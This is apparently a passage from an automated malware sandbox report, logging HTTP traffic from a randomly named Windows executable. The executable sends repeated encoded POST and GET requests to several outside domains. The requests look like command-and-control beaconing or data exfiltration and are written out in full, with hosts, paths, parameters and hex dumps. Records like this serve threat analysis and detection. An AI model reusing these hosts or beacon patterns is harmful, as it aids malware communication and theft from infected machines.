                                                                    Data Raw: 31 62 62 0d 0a a1 f0 19 00 20 ff cf 99 d3 ca 23 4d 9e 68 07 45 ef 9b d6 a7 dc 96 4a bd 5e 33 70 53 d0 08 13 4d f5 dc 0f 5e 76 f9 62 c0 09 3f ff db cc 06 36 d0 d9 5c b3 67 7f 82 d4 83 63 6e 8d 40 bb 24 b0 4d a7 87 46 8d 00 79 52 d3 9e 61 36 92 76 11 f6 17 18 35 ad e8 c6 4d 85 66 2e 75 39 c1 c8 5d 78 06 e0 8c 85 cf ef da f8 21 17 79 61 48 a2 0e 35 82 55 59 eb 0e 02 96 ac a1 09 27 e4 1f e2 a1 fd 9f 22 f5 64 b7 1e 39 c0 b5 61 e0 f3 9b 1a 48 00 76 8d a5 75 e3 fc 5c 0a 47 7f e5 ef e9 5f 4c e6 00 d7 f3 b9 dc 5d ea 08 95 60 99 5a c0 98 3a 88 6b d7 32 ef db 5f 3b df 27 d6 07 2f e1 8d f9 74 df 97 38 c6 15 c6 c4 bf f8 90 40 23 2f e1 cb ae 7a 43 26 ff eb 1d 48 00 e8 3f b0 e3 8c 29 29 4c 2c 64 92 a4 26 17 bc d4 3c 63 85 30 8a 89 58 e5 98 50 65 f3 b6 28 b3 3c d7 a9 b5 b6 e4 3a 13 22 2f 45 cc 44 ca 4a a6 72 e1 ca 78 40 34 c0 b2 97 0a cd 13 c3 5d e1 0a 99 49 6d 12 a6 cb 3c 8f b5 28 f2 4c 8f a4 36 13 bd 6d ec 04 30 07 f8 f7 77 69 17 4b c0 3e d2 30 c1 ae 5f df 7f 84 c6 ea f9 6e ba f4 34 4d a9 a4 8a 10 1f d7 28 32 3f [TRUNCATED]
                                                                    Data Ascii: 1bb #MhEJ^3pSM^vb?6\gcn@$MFyRa6v5Mf.u9]x!yaH5UY'"d9aHvu\G_L]`Z:k2_;'/t8@#/zC&H?))L,d&<c0XPe(<:"/EDJrx@4]Im<(L6m0wiK>0_n4M(2?vwEQwVYbb=k}4tE=H0K.HG-D)<*Ef*Zjo1ZdVAarU0T*gV&"0


                                                                    Session ID: 43 | Source IP: 192.168.2.8 | Source Port: 49752 | Destination IP: 185.27.134.144 | Destination Port: 80 | PID: 5952 | Process: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe
                                                                    Timestamp: Dec 5, 2024 09:46:19.980600119 CET | Bytes transferred: 1811 | Direction: OUT | Data: POST /pxvi/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.amayavp.xyz
                                                                    Origin: http://www.amayavp.xyz
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 1245
                                                                    Cache-Control: max-age=0
                                                                    Referer: http://www.amayavp.xyz/pxvi/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
                                                                    Data Raw: 64 70 79 34 76 44 4b 50 3d 2f 4a 5a 61 4c 69 30 45 61 52 4b 41 69 56 2b 6d 7a 68 58 47 73 62 63 42 34 35 66 42 4a 39 37 44 75 4f 73 2b 4c 7a 6b 6c 78 47 59 72 78 77 59 7a 52 38 35 46 35 61 39 41 72 51 4c 44 6c 72 46 6c 35 6a 6f 4a 77 33 4a 66 52 36 64 32 59 75 34 50 48 70 75 37 75 72 7a 4c 36 4c 6c 52 4d 53 38 33 74 57 31 79 65 32 31 31 4d 42 4f 6e 6e 39 61 56 54 4b 2b 52 65 2f 6b 5a 68 43 58 2b 56 62 4f 76 45 72 6d 6c 4e 33 41 45 2f 36 38 6d 72 4a 64 4f 38 42 43 6d 32 45 57 4d 46 74 4f 6f 50 4d 49 73 64 68 35 6f 4d 31 66 71 36 45 73 2b 69 77 4c 46 36 74 4e 58 34 74 48 70 41 76 6d 31 74 78 66 4a 71 66 6d 74 30 2b 65 7a 42 71 2f 51 53 34 4e 52 38 50 46 50 2f 69 32 36 35 39 74 6f 4c 71 58 72 6f 48 46 73 59 63 69 4b 54 43 4b 33 2b 65 37 4d 78 61 4b 4a 48 66 59 2f 6c 71 2f 4c 76 32 34 6a 72 4d 46 4f 4b 41 58 67 56 4f 34 73 4c 4f 36 6f 5a 43 42 67 39 63 62 53 76 48 66 33 58 4d 78 42 38 77 50 70 6c 77 44 67 2b 74 6c 30 57 6d 55 69 59 4c 78 55 70 4a 68 49 32 79 68 66 57 6a 6a 2b 49 73 53 59 35 34 4d 38 50 [TRUNCATED]
                                                                    Data Ascii: dpy4vDKP=[TRUNCATED]
                                                                    Timestamp: Dec 5, 2024 09:46:21.214456081 CET | Bytes transferred: 685 | Direction: IN | Data: HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Thu, 05 Dec 2024 08:46:21 GMT
                                                                    Content-Type: text/html
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                    Cache-Control: no-cache
                                                                    Content-Encoding: br
                                                                    Data Raw: 31 62 62 0d 0a a1 f0 19 00 20 ff cf 99 d3 ca 23 4d 9e 68 07 45 ef 9b d6 a7 dc 96 4a bd 5e 33 70 53 d0 08 13 4d f5 dc 0f 5e 76 f9 62 c0 09 3f ff db cc 06 36 d0 d9 5c b3 67 7f 82 d4 83 63 6e 8d 40 bb 24 b0 4d a7 87 46 8d 00 79 52 d3 9e 61 36 92 76 11 f6 17 18 35 ad e8 c6 4d 85 66 2e 75 39 c1 c8 5d 78 06 e0 8c 85 cf ef da f8 21 17 79 61 48 a2 0e 35 82 55 59 eb 0e 02 96 ac a1 09 27 e4 1f e2 a1 fd 9f 22 f5 64 b7 1e 39 c0 b5 61 e0 f3 9b 1a 48 00 76 8d a5 75 e3 fc 5c 0a 47 7f e5 ef e9 5f 4c e6 00 d7 f3 b9 dc 5d ea 08 95 60 99 5a c0 98 3a 88 6b d7 32 ef db 5f 3b df 27 d6 07 2f e1 8d f9 74 df 97 38 c6 15 c6 c4 bf f8 90 40 23 2f e1 cb ae 7a 43 26 ff eb 1d 48 00 e8 3f b0 e3 8c 29 29 4c 2c 64 92 a4 26 17 bc d4 3c 63 85 30 8a 89 58 e5 98 50 65 f3 b6 28 b3 3c d7 a9 b5 b6 e4 3a 13 22 2f 45 cc 44 ca 4a a6 72 e1 ca 78 40 34 c0 b2 97 0a cd 13 c3 5d e1 0a 99 49 6d 12 a6 cb 3c 8f b5 28 f2 4c 8f a4 36 13 bd 6d ec 04 30 07 f8 f7 77 69 17 4b c0 3e d2 30 c1 ae 5f df 7f 84 c6 ea f9 6e ba f4 34 4d a9 a4 8a 10 1f d7 28 32 3f [TRUNCATED]
                                                                    Data Ascii: 1bb #MhEJ^3pSM^vb?6\gcn@$MFyRa6v5Mf.u9]x!yaH5UY'"d9aHvu\G_L]`Z:k2_;'/t8@#/zC&H?))L,d&<c0XPe(<:"/EDJrx@4]Im<(L6m0wiK>0_n4M(2?vwEQwVYbb=k}4tE=H0K.HG-D)<*Ef*Zjo1ZdVAarU0T*gV&"0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    44 | 192.168.2.8 | 49753 | 185.27.134.144 | 80 | 5952 | C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Dec 5, 2024 09:46:22.649477005 CET | 516 | OUT | GET /pxvi/?dpy4vDKP=yLx6IXsyZhSq7U6uqCPnr6ME+5G/BY7+mMEXOiclzjhJwCZdUbRes612uS6KmZhj3zV5mWNPQZslZbRtI4SShrzI4pEvHSsV/RdVS1ssPCnJ48fYcpfjGOVa6yb/Zo31Sw==&t8=erepa0aHg HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Host: www.amayavp.xyz
                                                                    Connection: close
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
                                                                    Dec 5, 2024 09:46:23.882405043 CET | 1187 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Thu, 05 Dec 2024 08:46:23 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 986
                                                                    Connection: close
                                                                    Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 61 65 73 2e 6a 73 22 20 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 74 6f 4e 75 6d 62 65 72 73 28 64 29 7b 76 61 72 20 65 3d 5b 5d 3b 64 2e 72 65 70 6c 61 63 65 28 2f 28 2e 2e 29 2f 67 2c 66 75 6e 63 74 69 6f 6e 28 64 29 7b 65 2e 70 75 73 68 28 70 61 72 73 65 49 6e 74 28 64 2c 31 36 29 29 7d 29 3b 72 65 74 75 72 6e 20 65 7d 66 75 6e 63 74 69 6f 6e 20 74 6f 48 65 78 28 29 7b 66 6f 72 28 76 61 72 20 64 3d 5b 5d 2c 64 3d 31 3d 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 26 26 61 72 67 75 6d 65 6e 74 73 5b 30 5d 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 41 72 72 61 79 3f 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3a 61 72 67 75 6d 65 6e 74 73 2c 65 3d 22 22 2c 66 3d 30 3b 66 3c 64 2e 6c 65 6e 67 74 68 3b 66 2b 2b 29 65 2b 3d 28 31 36 3e 64 5b 66 5d 3f 22 30 22 3a 22 22 29 2b 64 5b 66 5d 2e 74 6f 53 74 72 69 6e 67 28 31 36 [TRUNCATED]
                                                                    Data Ascii: <html><body><script type="text/javascript" src="/aes.js" ></script><script>function toNumbers(d){var e=[];d.replace(/(..)/g,function(d){e.push(parseInt(d,16))});return e}function toHex(){for(var d=[],d=1==arguments.length&&arguments[0].constructor==Array?arguments[0]:arguments,e="",f=0;f<d.length;f++)e+=(16>d[f]?"0":"")+d[f].toString(16);return e.toLowerCase()}var a=toNumbers("f655ba9d09a112d4968c63579db590b4"),b=toNumbers("98344c2eee86c3994890592585b49f80"),c=toNumbers("53347c61d6f7f7a3acd15c8440c9743c");document.cookie="__test="+toHex(slowAES.decrypt(c,2,a,b))+"; expires=Thu, 31-Dec-37 23:55:55 GMT; path=/"; location.href="http://www.amayavp.xyz/pxvi/?dpy4vDKP=yLx6IXsyZhSq7U6uqCPnr6ME+5G/BY7+mMEXOiclzjhJwCZdUbRes612uS6KmZhj3zV5mWNPQZslZbRtI4SShrzI4pEvHSsV/RdVS1ssPCnJ48fYcpfjGOVa6yb/Zo31Sw==&t8=erepa0aHg&i=1";</script><noscript>This site requires Javascript to work, please enable Javascript in your browser or use a browser with Javascript support</noscript></body></html>


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    45 | 192.168.2.8 | 49754 | 85.159.66.93 | 80 | 5952 | C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Dec 5, 2024 09:46:30.178348064 CET | 786 | OUT | POST /nlsy/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.beythome.online
                                                                    Origin: http://www.beythome.online
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 209
                                                                    Cache-Control: max-age=0
                                                                    Referer: http://www.beythome.online/nlsy/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
                                                                    Data Raw: 64 70 79 34 76 44 4b 50 3d 5a 6f 78 70 67 53 61 68 4e 41 54 57 52 6f 4d 6c 51 46 66 6a 58 78 30 31 78 4f 36 46 61 31 31 58 57 51 66 4c 76 74 55 69 74 57 61 4a 2b 2b 36 48 67 6e 4c 45 72 47 59 54 61 39 50 44 52 4a 47 2f 47 74 2b 64 52 51 4c 61 77 4a 30 5a 43 6b 32 64 4c 74 31 47 43 75 58 59 44 6d 52 79 59 30 4e 37 55 79 54 70 32 38 74 4f 61 2f 37 6d 30 68 30 77 4b 6f 45 2f 5a 55 30 34 50 52 72 57 43 33 55 6d 2f 4e 66 49 73 54 43 41 2f 37 30 4b 54 7a 77 43 71 6e 42 2f 62 6f 4a 59 67 76 59 6b 4f 7a 6a 79 47 66 34 62 47 72 30 69 2b 35 56 4a 6d 35 77 75 50 69 72 45 6c 4c 44 6c 54 70 41 43 56 2b 73 37 54 4e 64 76 77 6e 63 3d
                                                                    Data Ascii: dpy4vDKP=ZoxpgSahNATWRoMlQFfjXx01xO6Fa11XWQfLvtUitWaJ++6HgnLErGYTa9PDRJG/Gt+dRQLawJ0ZCk2dLt1GCuXYDmRyY0N7UyTp28tOa/7m0h0wKoE/ZU04PRrWC3Um/NfIsTCA/70KTzwCqnB/boJYgvYkOzjyGf4bGr0i+5VJm5wuPirElLDlTpACV+s7TNdvwnc=


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    46 | 192.168.2.8 | 49755 | 85.159.66.93 | 80 | 5952 | C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Dec 5, 2024 09:46:32.833400011 CET | 806 | OUT | POST /nlsy/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.beythome.online
                                                                    Origin: http://www.beythome.online
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 229
                                                                    Cache-Control: max-age=0
                                                                    Referer: http://www.beythome.online/nlsy/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
                                                                    Data Raw: 64 70 79 34 76 44 4b 50 3d 5a 6f 78 70 67 53 61 68 4e 41 54 57 51 49 38 6c 63 43 44 6a 52 52 30 32 36 75 36 46 51 56 30 51 57 51 44 4c 76 6f 30 79 75 6b 2b 4a 2b 63 79 48 68 6d 4c 45 6f 47 59 54 52 64 50 47 66 70 47 6f 47 71 32 4b 52 56 72 61 77 4a 67 5a 43 68 4b 64 4b 63 31 42 41 2b 58 61 62 57 52 77 48 6b 4e 37 55 79 54 70 32 34 4e 6f 61 2b 54 6d 30 53 38 77 4c 4b 73 77 48 6b 30 37 47 78 72 57 47 33 55 69 2f 4e 65 6c 73 52 32 75 2f 35 63 4b 54 78 34 43 72 7a 56 34 52 6f 4a 53 39 66 5a 44 50 54 6e 2f 48 50 30 44 50 62 6b 68 2b 6f 31 6d 6e 50 42 45 56 41 6a 43 6d 4c 72 4f 54 71 6f 30 51 4a 78 54 4a 75 4e 66 75 77 4c 48 71 77 46 75 4a 42 30 62 41 38 2f 59 57 33 59 76 74 74 64 59
                                                                    Data Ascii: dpy4vDKP=ZoxpgSahNATWQI8lcCDjRR026u6FQV0QWQDLvo0yuk+J+cyHhmLEoGYTRdPGfpGoGq2KRVrawJgZChKdKc1BA+XabWRwHkN7UyTp24Noa+Tm0S8wLKswHk07GxrWG3Ui/NelsR2u/5cKTx4CrzV4RoJS9fZDPTn/HP0DPbkh+o1mnPBEVAjCmLrOTqo0QJxTJuNfuwLHqwFuJB0bA8/YW3YvttdY


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    47 | 192.168.2.8 | 49756 | 85.159.66.93 | 80 | 5952 | C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Dec 5, 2024 09:46:35.497387886 CET | 1823 | OUT | POST /nlsy/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.beythome.online
                                                                    Origin: http://www.beythome.online
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 1245
                                                                    Cache-Control: max-age=0
                                                                    Referer: http://www.beythome.online/nlsy/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
                                                                    Data Raw: 64 70 79 34 76 44 4b 50 3d 5a 6f 78 70 67 53 61 68 4e 41 54 57 51 49 38 6c 63 43 44 6a 52 52 30 32 36 75 36 46 51 56 30 51 57 51 44 4c 76 6f 30 79 75 6b 32 4a 2b 4f 4b 48 68 46 7a 45 70 47 59 54 50 74 50 48 66 70 47 51 47 72 53 47 52 56 76 6b 77 4e 51 5a 43 45 47 64 44 4f 64 42 4b 2b 58 61 48 6d 52 31 59 30 4e 69 55 79 6a 74 32 38 70 6f 61 2b 54 6d 30 53 51 77 4d 59 45 77 46 6b 30 34 50 52 72 43 43 33 56 46 2f 4a 4b 62 73 52 79 51 34 49 38 4b 54 53 51 43 6d 6d 42 34 5a 6f 4a 55 38 66 5a 62 50 53 61 2f 48 50 6f 31 50 59 35 45 2b 72 6c 6d 6e 34 78 62 48 46 44 30 34 37 62 50 62 71 38 4c 59 4c 70 4b 4b 39 35 4c 6b 52 48 42 69 6c 5a 78 42 33 4d 7a 4f 4d 4c 56 56 77 51 67 70 72 6f 77 39 61 37 75 53 44 55 69 45 59 72 51 50 2b 68 41 47 42 2f 72 41 4e 36 47 71 79 77 73 67 69 35 35 2f 7a 69 7a 62 34 39 57 44 48 63 6c 7a 5a 76 5a 48 6b 31 34 32 45 72 74 78 6a 33 5a 50 39 6b 46 43 72 78 4f 76 50 6e 38 65 4a 59 4b 58 4d 38 30 58 6b 53 72 33 45 72 54 36 4d 32 55 63 66 39 75 65 4b 4b 2b 77 4b 38 4b 68 48 79 42 4c [TRUNCATED]


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    48 | 192.168.2.8 | 49757 | 85.159.66.93 | 80 | 5952 | C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Dec 5, 2024 09:46:38.160312891 CET | 520 | OUT | GET /nlsy/?t8=erepa0aHg&dpy4vDKP=UqZJjljcaDHPU5MJF3/VZj5j3teXWnZaRQ/xhIwYknb6hebLg3nkkQRCQY+bdc+EMOTwSi3/zIBCbkzFO/JkBIXeM3N7PUFbamj23ddqQuGG3w5lM7wcBAQnAQO0NkBIlw== HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Host: www.beythome.online
                                                                    Connection: close
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
                                                                    Dec 5, 2024 09:46:39.481437922 CET | 225 | IN | HTTP/1.1 404 Not Found
                                                                    Server: nginx/1.14.1
                                                                    Date: Thu, 05 Dec 2024 08:46:39 GMT
                                                                    Content-Length: 0
                                                                    Connection: close
                                                                    X-Rate-Limit-Limit: 5s
                                                                    X-Rate-Limit-Remaining: 19
                                                                    X-Rate-Limit-Reset: 2024-12-05T08:46:44.2627996Z


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    49 | 192.168.2.8 | 49758 | 154.23.184.207 | 80 | 5952 | C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Dec 5, 2024 09:46:45.150978088 CET | 768 | OUT | POST /e60d/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.d48dk.top
                                                                    Origin: http://www.d48dk.top
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 209
                                                                    Cache-Control: max-age=0
                                                                    Referer: http://www.d48dk.top/e60d/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
                                                                    Data Raw: 64 70 79 34 76 44 4b 50 3d 47 6a 55 6f 61 51 58 6c 62 6c 6b 4c 43 64 50 4f 32 42 78 79 57 4a 56 69 79 33 5a 69 36 67 57 4b 4e 4b 64 32 4a 46 39 68 74 31 37 68 52 49 73 49 4a 34 4a 71 5a 4a 4e 69 56 4b 62 4f 47 6b 4e 6f 4e 48 4a 2b 41 6c 4d 56 42 6a 39 71 69 62 6b 69 33 66 64 43 78 78 71 4e 4e 77 4b 4c 34 6d 6d 44 50 75 52 53 76 45 6f 57 39 7a 4c 53 51 4d 37 48 50 4e 4b 67 58 6d 70 7a 64 67 48 59 56 4b 6d 57 53 79 4b 74 70 39 49 2f 6b 74 74 57 58 36 69 54 4c 50 54 62 49 47 48 77 66 74 30 46 48 6d 63 41 79 67 79 6f 32 35 2f 6b 30 56 52 55 74 51 6f 49 78 70 73 61 74 6b 75 36 52 6b 31 6c 44 7a 48 39 55 71 31 67 62 69 34 3d
                                                                    Data Ascii: dpy4vDKP=GjUoaQXlblkLCdPO2BxyWJViy3Zi6gWKNKd2JF9ht17hRIsIJ4JqZJNiVKbOGkNoNHJ+AlMVBj9qibki3fdCxxqNNwKL4mmDPuRSvEoW9zLSQM7HPNKgXmpzdgHYVKmWSyKtp9I/kttWX6iTLPTbIGHwft0FHmcAygyo25/k0VRUtQoIxpsatku6Rk1lDzH9Uq1gbi4=
                                                                    Dec 5, 2024 09:46:46.680783033 CET | 302 | IN | HTTP/1.1 404 Not Found
                                                                    Server: nginx
                                                                    Date: Thu, 05 Dec 2024 08:46:46 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 138
                                                                    Connection: close
                                                                    ETag: "66927002-8a"
                                                                    Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    50 | 192.168.2.8 | 49759 | 154.23.184.207 | 80 | 5952 | C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Dec 5, 2024 09:46:47.818855047 CET | 788 | OUT | POST /e60d/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.d48dk.top
                                                                    Origin: http://www.d48dk.top
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 229
                                                                    Cache-Control: max-age=0
                                                                    Referer: http://www.d48dk.top/e60d/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
                                                                    Data Raw: 64 70 79 34 76 44 4b 50 3d 47 6a 55 6f 61 51 58 6c 62 6c 6b 4c 44 2b 6e 4f 36 43 70 79 48 35 56 68 39 58 5a 69 6a 51 57 4f 4e 4b 52 32 4a 42 4e 78 74 44 54 68 52 71 6b 49 4b 36 68 71 61 4a 4e 69 66 71 62 50 62 30 4d 46 4e 47 30 44 41 6b 77 56 42 6e 56 71 69 65 59 69 33 75 64 42 33 68 71 44 46 51 4b 4a 31 47 6d 44 50 75 52 53 76 45 73 34 39 7a 44 53 4d 76 6a 48 56 73 4b 6a 55 6d 70 77 63 67 48 59 43 36 6d 53 53 79 4c 58 70 2f 73 42 6b 76 6c 57 58 37 53 54 4c 36 76 59 42 47 47 61 62 74 31 67 42 48 78 2f 79 51 4b 72 38 59 61 43 2f 6b 4a 58 73 6d 5a 69 72 4c 6b 63 75 6b 47 52 52 6e 64 54 47 45 61 56 4f 4a 6c 51 46 31 75 64 73 59 57 56 4c 35 36 44 2b 6d 6e 2f 58 4e 54 42 65 5a 64 6b
                                                                    Data Ascii: dpy4vDKP=GjUoaQXlblkLD+nO6CpyH5Vh9XZijQWONKR2JBNxtDThRqkIK6hqaJNifqbPb0MFNG0DAkwVBnVqieYi3udB3hqDFQKJ1GmDPuRSvEs49zDSMvjHVsKjUmpwcgHYC6mSSyLXp/sBkvlWX7STL6vYBGGabt1gBHx/yQKr8YaC/kJXsmZirLkcukGRRndTGEaVOJlQF1udsYWVL56D+mn/XNTBeZdk
                                                                    Dec 5, 2024 09:46:49.339220047 CET | 302 | IN | HTTP/1.1 404 Not Found
                                                                    Server: nginx
                                                                    Date: Thu, 05 Dec 2024 08:46:49 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 138
                                                                    Connection: close
                                                                    ETag: "66927002-8a"
                                                                    Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    51 | 192.168.2.8 | 49760 | 154.23.184.207 | 80 | 5952 | C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Dec 5, 2024 09:46:50.479295969 CET | 1805 | OUT | POST /e60d/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.d48dk.top
                                                                    Origin: http://www.d48dk.top
